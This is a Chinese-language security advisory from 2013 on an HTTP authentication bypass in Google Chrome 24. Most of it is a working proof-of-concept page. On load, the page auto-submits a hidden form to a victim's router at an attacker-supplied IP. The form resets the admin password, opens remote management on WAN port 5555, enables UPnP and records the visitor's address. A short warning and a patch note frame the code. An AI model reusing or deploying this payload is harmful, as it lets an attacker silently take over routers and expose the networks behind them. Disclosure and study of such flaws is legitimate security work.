Google Chrome 24.0.1312.57 HTTP验证安全绕过漏洞
发布日期:2013-02-15
更新日期:2013-02-19
受影响系统:Google Chrome 24.0.1312.57
描述:
BUGTRAQ ID:
57790
Google Chrome是由Google开发的一款设计简单、高效的Web浏览工具。
Chrome 24.0.1312.57及之前版本存在安全漏洞,攻击者可利用此漏洞绕过安全限制并通过多种HTML标签执行后台HTTP基本身份验证。
<*来源:T355
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?
//collect some info
$ip = $_GET["ip"];
$wan = $_SERVER['REMOTE_ADDR'];
?>
<html>
<head>
</head>
<body onload="sendPayload()">
<FORM id=password name=password action="http://<? echo $ip; ?>/manage.tri" method=post>
<input type=hidden name=remote_mgt_https value=0>
<input type=hidden name=http_enable value=1>
<input type=hidden name=https_enable value=0>
<input type=hidden name=PasswdModify value=0>
<input type=hidden name=http_passwd value=d6nw5v1x2pc7st9m>
<input type=hidden name=http_passwdConfirm value=d6nw5v1x2pc7st9m>
<input type=hidden name=_http_enable value=1>
<input type=hidden name=web_wl_filter value=1>
<input type=hidden name=remote_management value=1>
<input type=hidden name=http_wanport value=5555>
<input type=hidden name=upnp_enable value=1>
<input type=hidden name=layout value=en>
<input type="submit" value="submit">
</FORM>
<script>
function sendPayload(){
document.password.submit();
}
</script>
</body>
</html>
建议:
厂商补丁:
Google
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.google.com浏览次数:3989
严重程度:0(网友投票)
